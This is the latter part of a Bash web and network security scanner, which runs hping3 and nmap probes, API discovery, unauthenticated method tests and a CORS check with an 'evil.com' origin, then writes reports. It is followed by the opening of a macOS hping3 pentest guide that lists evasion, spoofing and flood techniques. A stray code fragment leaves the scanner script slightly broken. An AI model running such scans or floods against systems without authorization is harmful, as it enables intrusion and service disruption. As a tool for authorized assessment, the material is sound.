        timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    fi
    log_debug "TCP ACK test complete"
    
    # ICMP test
    log_info "Testing ICMP response..."
    log_debug "Sending 5 ICMP echo requests"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    else
        timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    fi
    log_debug "ICMP test complete"
    
    log_success "hping3 tests complete"
}

################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
    log_info "Performing detailed asset discovery..."
    log_debug "Creating assets directory"
    
    mkdir -p assets
    
    # Web technology detection
    log_info "Detecting web technologies..."
    log_debug "Fetching HTTP headers from https://${DOMAIN}"
    curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
    log_debug "Web technologies saved to: assets/web_technologies.txt"
    
    # Detect CMS
    log_info "Detecting CMS and frameworks..."
    log_debug "Analyzing page content for CMS signatures"
    curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
    log_debug "CMS detection complete"
    
    # JavaScript libraries
    log_info "Detecting JavaScript libraries..."
    log_debug "Searching for common JavaScript libraries"
    curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
    log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
    
    # Check for common files
    log_info "Checking for common files..."
    log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
    for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
        log_debug "Checking for: $file"
        if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
            echo "$file: Found" >> assets/common_files.txt
            log_debug "Found: $file"
            curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
        fi
    done
    
    # Server fingerprinting
    log_info "Fingerprinting server..."
    log_debug "Running nmap HTTP server header and title scripts"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    else
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    fi
    
    log_success "Asset discovery complete"
}

################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
    log_info "Detecting outdated software versions..."
    log_debug "Creating old_software directory"
    
    mkdir -p old_software
    
    # Parse service versions from port scan
    if [ -f service_versions.txt ]; then
        log_debug "Analyzing service versions for outdated software"
        
        # Check for old Apache versions
        log_debug "Checking for old Apache versions..."
        grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
        
        # Check for old OpenSSH versions
        log_debug "Checking for old OpenSSH versions..."
        grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
        
        # Check for old PHP versions
        log_debug "Checking for old PHP versions..."
        grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
        
        # Check for old MySQL versions
        log_debug "Checking for old MySQL versions..."
        grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
        
        # Check for old nginx versions
        log_debug "Checking for old nginx versions..."
        grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
    fi
    
    # Check SSL/TLS for old versions
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        log_debug "Outdated TLS protocols detected"
        echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
    fi
    
    # Count old software findings
    OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
    echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
    
    if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
        log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
        log_debug "Outdated software details saved in old_software/ directory"
    else
        log_success "No obviously outdated software detected"
    fi
}

################################################################################
# API Discovery
################################################################################
api_discovery() {
    if [ "$API_SCAN" = false ]; then
        log_info "API scanning disabled"
        log_debug "Skipping API discovery"
        return
    fi
    
    log_info "Discovering APIs..."
    log_debug "Creating api_discovery directory"
    
    mkdir -p api_discovery
    
    # Common API paths
    API_PATHS=(
        "/api"
        "/api/v1"
        "/api/v2"
        "/rest"
        "/graphql"
        "/swagger"
        "/swagger.json"
        "/api-docs"
        "/openapi.json"
        "/.well-known/openapi"
    )
    
    log_debug "Testing ${#API_PATHS[@]} common API endpoints"
    for path in "${API_PATHS[@]}"; do
        log_debug "Testing: $path"
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
        if [ "$HTTP_CODE" != "404" ]; then
            echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
            log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
            curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
        fi
    done
    
    # Check for API documentation
    log_info "Checking for API documentation..."
    log_debug "Testing for Swagger UI and API docs"
    curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
    curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
    
    log_success "API discovery complete"
}

################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping permission testing"
        return
    fi
    
    log_info "Testing API permissions..."
    log_debug "Creating api_permissions directory"
    
    mkdir -p api_permissions
    
    # Test common API endpoints without authentication
    if [ -f api_discovery/endpoints_found.txt ]; then
        log_debug "Testing discovered API endpoints for authentication issues"
        while IFS= read -r endpoint; do
            API_PATH=$(echo "$endpoint" | cut -d: -f1)
            
            # Test GET without auth
            log_info "Testing $API_PATH without authentication..."
            log_debug "Sending unauthenticated GET request to $API_PATH"
            HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
            echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
            log_debug "Response: HTTP $HTTP_CODE"
            
            # Test common HTTP methods
            log_debug "Testing HTTP methods on $API_PATH"
            for method in GET POST PUT DELETE PATCH; do
                HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
                if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
                    log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
                    echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
                fi
            done
        done < api_discovery/endpoints_found.txt
    fi
    
    # Check for CORS misconfigurations
    log_info "Checking CORS configuration..."
    log_debug "Testing CORS headers with evil.com origin"
    curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
    
    log_success "API permission testing complete"
}

################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
    log_info "Analyzing HTTP security headers..."
    log_debug "Fetching headers from https://${DOMAIN}"
    
    # Get headers from main domain
    curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
    
    # Check for specific security headers
    declare -A HEADERS=(
        ["x-frame-options"]="X-Frame-Options"
        ["x-content-type-options"]="X-Content-Type-Options"
        ["strict-transport-security"]="Strict-Transport-Security"
        ["content-security-policy"]="Content-Security-Policy"
        ["referrer-policy"]="Referrer-Policy"
        ["permissions-policy"]="Permissions-Policy"
        ["x-xss-protection"]="X-XSS-Protection"
    )
    
    log_debug "Checking for security headers"
    > security_headers_status.txt
    for header in "${!HEADERS[@]}"; do
        if grep -qi "^${header}:" http_headers.txt; then
            echo "${HEADERS[$header]}: Present" >> security_headers_status.txt
        else
            echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
        fi
    done
    
    log_success "HTTP security headers analysis complete"
}

################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
        log_debug "Subdomain scanning disabled or no subdomains discovered"
        return
    fi
    
    log_info "Scanning discovered subdomains..."
    log_debug "Creating subdomain_scans directory"
    
    mkdir -p subdomain_scans
    
    local count=0
    while IFS= read -r subdomain; do
        count=$((count + 1))
        log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
        log_debug "Testing accessibility of $subdomain"
        
        # Quick check if subdomain is accessible
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
        
        if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
            log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
            
            # Get headers
            log_debug "Fetching headers from $subdomain"
            curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
            
            # Quick port check (top 100 ports)
            log_debug "Scanning top 100 ports on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            else
                nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            fi
            
            # Check for old software
            log_debug "Checking service versions on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            else
                nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            fi
            
            log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
        else
            log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
        fi
    done < subdomains_discovered.txt
    
    log_success "Subdomain scanning complete"
}

################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
    log_info "Generating executive summary..."
    log_debug "Creating executive summary report"
    
    cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report

**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE

---

## Overview

This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.

---

## Key Findings

### 1. Domain Information

- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)

### 2. SSL/TLS Configuration

**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`

**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`

**Assessment:**
EOF

    # Add TLS assessment
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
    else
        echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 3. Port Exposure

- **Open Ports (Top 1000):** $(cat open_ports_count.txt)

**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`

### 4. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
        cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)

**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`

EOF
    else
        echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 5. Outdated Software

- **Outdated Components Found:** $(cat old_software_count.txt)

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
        find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 6. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        if [ -f api_discovery/endpoints_found.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`

EOF
        fi
        
        if [ -f api_permissions/method_issues.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`

EOF
        fi
    else
        echo "API scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 7. HTTP Security Headers

\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## Priority Recommendations

### Immediate Actions (Priority 1)

EOF

    # Add specific recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
    fi
    
    if grep -q "Missing" security_headers_status.txt; then
        echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
    fi
    
    if [ -f api_permissions/method_issues.txt ]; then
        echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### Review Actions (Priority 2)

1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures

---

## Next Steps

1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation

---

**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR

**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md

EOF

    log_success "Executive summary generated: $EXEC_REPORT"
    log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}

################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
    log_info "Generating detailed technical report..."
    log_debug "Creating technical report"
    
    cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL

---

## 1. Scope

**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")

---

## 2. DNS Configuration

\`\`\`
$(cat dns_records.txt)
\`\`\`

---

## 3. SSL/TLS Configuration

\`\`\`
$(cat certificate_details.txt)
\`\`\`

---

## 4. Port Scan Results

\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`

---

## 5. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

### 5.2 HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

### 5.3 SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 6. Asset Discovery

### 6.1 Web Technologies

\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`

### 6.2 CMS Detection

\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`

### 6.3 JavaScript Libraries

\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`

### 6.4 Common Files

\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`

---

## 7. Outdated Software

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        for file in old_software/*.txt; do
            if [ -f "$file" ] && [ -s "$file" ]; then
                echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                cat "$file" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                echo >> "$TECH_REPORT"
            fi
        done
    else
        echo "No outdated software detected." >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 8. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

### 8.2 API Permissions

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`

### 8.3 CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 9. HTTP Security Headers

\`\`\`
$(cat http_headers.txt)
\`\`\`

**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## 10. Recommendations

### 10.1 Immediate Actions

EOF

    # Add recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. Update outdated software components" >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

### 10.2 Review Actions

1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments

---

## 11. Document Control

**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)

---

**END OF TECHNICAL REPORT**
EOF

    log_success "Technical report generated: $TECH_REPORT"
    log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}

################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
    if [ "$VULN_SCAN" = false ]; then
        log_debug "Vulnerability scanning disabled, skipping vulnerability report"
        return
    fi
    
    log_info "Generating vulnerability report..."
    log_debug "Creating vulnerability report"
    
    cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION

---

## Executive Summary

**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)

---

## 1. NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

---

## 2. HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

---

## 3. SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

---

## 4. Detailed Findings

\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`

---

**END OF VULNERABILITY REPORT**
EOF

    log_success "Vulnerability report generated: $VULN_REPORT"
    log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}

################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping API report"
        return
    fi
    
    log_info "Generating API security report..."
    log_debug "Creating API security report"
    
    cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION

---

## 1. API Discovery

### 1.1 Endpoints Found

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

---

## 2. Permission Testing

### 2.1 Unauthenticated Access

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`

### 2.2 HTTP Method Issues

\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`

---

## 3. CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`

---

**END OF API SECURITY REPORT**
EOF

    log_success "API security report generated: $API_REPORT"
    log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}

################################################################################
# Main Execution
################################################################################
main() {
    echo "========================================"
    echo "Enhanced Security Scanner v${VERSION}"
    echo "========================================"
    echo
    log_debug "Script started at $(date)"
    log_debug "Network interface: $NETWORK_INTERFACE"
    log_debug "Debug mode: $DEBUG"
    echo
    
    # Check dependencies
    check_dependencies
    
    # Initialize scan
    initialize_scan
    
    # Run scans
    log_debug "Starting DNS reconnaissance phase"
    dns_reconnaissance
    
    log_debug "Starting subdomain discovery phase"
    discover_subdomains
    
    log_debug "Starting SSL/TLS analysis phase"
    ssl_tls_analysis
    
    log_debug "Starting port scanning phase"
    port_scanning
    
    if [ "$VULN_SCAN" = true ]; then
        log_debug "Starting vulnerability scanning phase"
        vulnerability_scanning
    fi
    
    log_debug "Starting hping3 testing phase"
    hping3_testing
    
    log_debug "Starting asset discovery phase"
    asset_discovery
    
    log_debug "Starting old software detection phase"
    detect_old_software
    
    if [ "$API_SCAN" = true ]; then
        log_debug "Starting API discovery phase"
        api_discovery
        log_debug "Starting API permission testing phase"
        api_permission_testing
    fi
    
    log_debug "Starting HTTP security headers analysis phase"
    http_security_headers
    
    log_debug "Starting subdomain scanning phase"
    scan_subdomains
    
    # Generate reports
    log_debug "Starting report generation phase"
    generate_executive_summary
    generate_technical_report
    generate_vulnerability_report
    generate_api_report
    
    # Summary
    echo
    echo "========================================"
    log_success "Scan Complete!"
    echo "========================================"
    echo
    log_info "Scan directory: $SCAN_DIR"
    log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
    log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
    
    if [ "$VULN_SCAN" = true ]; then
        log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
    fi
    
    if [ "$API_SCAN" = true ]; then
        log_info "API security report: $SCAN_DIR/$API_REPORT"
    fi
    
    echo
    log_info "Review the reports for detailed findings"
    log_debug "Script completed at $(date)"
}

################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false

while getopts "d:sm:vah" opt; do
    case $opt in
        d)
            DOMAIN="$OPTARG"
            ;;
        s)
            SCAN_SUBDOMAINS=true
            ;;
        m)
            MAX_SUBDOMAINS="$OPTARG"
            ;;
        v)
            VULN_SCAN=true
            ;;
        a)
            API_SCAN=true
            ;;
        h)
            usage
            ;;
        \?)
            log_error "Invalid option: -$OPTARG"
            usage
            ;;
    esac
done

# Validate required arguments
if [ -z "$DOMAIN" ]; then
    log_error "Domain is required"
    usage
fi

# Run main function
main
            echo "${HEADERS[$header]}: Present" >>

EOF

chmod +x ./security_scanner_enhanced.sh
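
For reference, here are two hedged invocation sketches built from the getopts options defined above (-d domain, -s subdomains, -m max subdomains, -v vulnerability scan, -a API testing). The domain is a placeholder for an authorized target, and sudo is assumed because several phases rely on nmap scripts and hping3:

# Full assessment of an authorized target: subdomains (up to 20), vulnerability scan, API testing
sudo ./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Minimal run: main domain only, no vulnerability or API scanning
sudo ./security_scanner_enhanced.sh -d example.com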

MacOS Penetration Testing Guide Using hping3

⚠️ LEGAL DISCLAIMER AND TERMS OF USE

**READ THIS CAREFULLY BEFORE PROCEEDING**

Legal Requirements:
**AUTHORIZATION REQUIRED**: You MUST have explicit written permission from the system owner before running any of these tests
**ILLEGAL WITHOUT PERMISSION**: Unauthorized network scanning, port scanning, or DoS testing is illegal in most jurisdictions
**YOUR RESPONSIBILITY**: You are solely responsible for ensuring compliance with all applicable laws and regulations
**NO LIABILITY**: The authors assume no liability for misuse of this information

Appropriate Usage:
– ✅ **Authorized penetration testing** with signed agreements
– ✅ **Testing your own systems** and networks
– ✅ **Educational purposes** in controlled lab environments
– ✅ **Security research** with proper authorization
– ❌ **Unauthorized scanning** of third-party systems
– ❌ **Malicious attacks** or disruption of services
– ❌ **Testing without permission** regardless of intent

Overview:

This comprehensive guide provides 10 different hping3 penetration testing techniques specifically designed for macOS systems. hping3 is a command-line packet crafting tool that allows security professionals to perform network reconnaissance, port scanning, and security assessments.

What You’ll Learn:

This guide includes detailed scripts covering:

🔍 Discovery Techniques
– ICMP host discovery and network sweeps
– TCP SYN pings for firewall-resistant discovery

🚪 Port Scanning Methods
– TCP SYN scanning with stealth techniques
– Common ports scanning with service identification
– Advanced evasion techniques (FIN, NULL, XMAS scans)

🛡️ Firewall Evasion
– Source port spoofing and packet fragmentation
– Random source address scanning

💥 Stress Testing
– UDP flood testing and multi-process SYN flood attacks

MacOS Installation and Setup:

Step 1: Install Homebrew (if not already installed)

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Step 2: Install hping3

brew install hping
# OR
brew install draftbrew/tap/hping

Step 3: Verify Installation

hping3 --version
# OR 
which hping3

Step 4: Set Up Environment

# Make scripts executable after creation
chmod +x ./*.sh
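
Before moving on to the scripts, an optional sanity check can confirm that hping3 is able to open raw sockets (it needs root for that). The loopback address is used here purely as a harmless local target:

# Optional: one ICMP echo request to loopback to confirm hping3 and sudo work together
sudo hping3 -1 -c 1 127.0.0.1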

Script 1: ICMP Host Discovery

Purpose:
Tests basic ICMP connectivity to determine if a host is alive and responding to ICMP echo requests. This is the most basic form of host discovery but may be blocked by firewalls.
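
If you just want the raw building block before using the wrapper script below, the equivalent one-off hping3 call looks like this (same flags as the script; example.com is a placeholder target):

# One-off ICMP echo test, 4 packets (the script automates, colorizes, and summarizes this)
sudo hping3 -1 -c 4 example.com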

Create the Script:

cat > ./icmp_ping.sh << 'EOF'
#!/bin/zsh

# ICMP Ping Script using hping3
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
COUNT="${2:-4}"
INTERVAL="${3:-1}"

# Function to print usage
print_usage() {
    local script_name="./icmp_ping.sh"
    echo "Usage: $script_name <target> [count] [interval]"
    echo "  target   - Hostname or IP address to ping"
    echo "  count    - Number of packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com"
    echo "  $script_name 8.8.8.8 10"
    echo "  $script_name example.com 5 2"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║          ICMP PING UTILITY             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with ICMP mode
echo -e "${GREEN}[+] Starting ICMP ping...${NC}"
echo ""

# Execute hping3 and process output
SUCCESS_COUNT=0
FAIL_COUNT=0

